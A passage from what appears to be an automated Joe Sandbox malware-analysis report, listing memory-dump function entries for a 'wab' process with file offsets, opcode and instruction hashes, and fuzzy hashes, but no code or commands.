                                                                            • Source File: 00000009.00000002.3238647491.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_24c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: a4f3cc94dc4d641baa7283050be731b0dc4e472647fac32fb8c8ebd78dd12794
                                                                            • Instruction ID: e762b7f27f818dfaf29d8e9714db7d0d59eae6b025eac28b00c949c60f2dfc8a
                                                                            • Opcode Fuzzy Hash: a4f3cc94dc4d641baa7283050be731b0dc4e472647fac32fb8c8ebd78dd12794
                                                                            • Instruction Fuzzy Hash: A321E6B5D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C775A940CBA5
                                                                            Function 0248D4A0 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3238449814.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_248d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dcd939bcc9ef0065796e05b9aa8ee0a1bcb72b94d27ace0acb588fabe1e49f81
                                                                            • Instruction ID: d89fa143fc56615819a66137557da71b168f85d3137fc62f4ece0e884bcd7cce
                                                                            • Opcode Fuzzy Hash: dcd939bcc9ef0065796e05b9aa8ee0a1bcb72b94d27ace0acb588fabe1e49f81
                                                                            • Instruction Fuzzy Hash: 2F2106B1955200DFDB05EF24D9C0F2BBFA5FB88318F20C56AD9090A396C33AD456C7A2
                                                                            Function 0248D49B Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3238449814.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_248d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65f5823e5860dd45ab87c05c70a30e3bb3bcd9a98f412a0dadd226b90d9a92a7
                                                                            • Instruction ID: 0eb152cf4494e1f9eb532c9fbdbaeca47bf897da1e37ad164680c2b51a8a9dee
                                                                            • Opcode Fuzzy Hash: 65f5823e5860dd45ab87c05c70a30e3bb3bcd9a98f412a0dadd226b90d9a92a7
                                                                            • Instruction Fuzzy Hash: 6611D3B6905240CFDB16DF14D5C4B1ABFB2FB84324F24C5AAD9490B356C336D45ACBA2

                                                                            Non-executed Functions

                                                                            Function 0248D01C Relevance: .1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3238449814.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_248d000_wab.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: de00455b6bd0720793a676b31f9f9710d5ba6b0e78fdcea1661775a8ae8a9bfe
                                                                            • Instruction ID: e947208ca71c70e6b176979863bb91e4406f2822d4ad23c855a84af21f29421a
                                                                            • Opcode Fuzzy Hash: de00455b6bd0720793a676b31f9f9710d5ba6b0e78fdcea1661775a8ae8a9bfe
                                                                            • Instruction Fuzzy Hash: 852126B0A15244DFD714EF34D580B2ABBA5EB85318F20C66ED90A4B381C33AD847CA62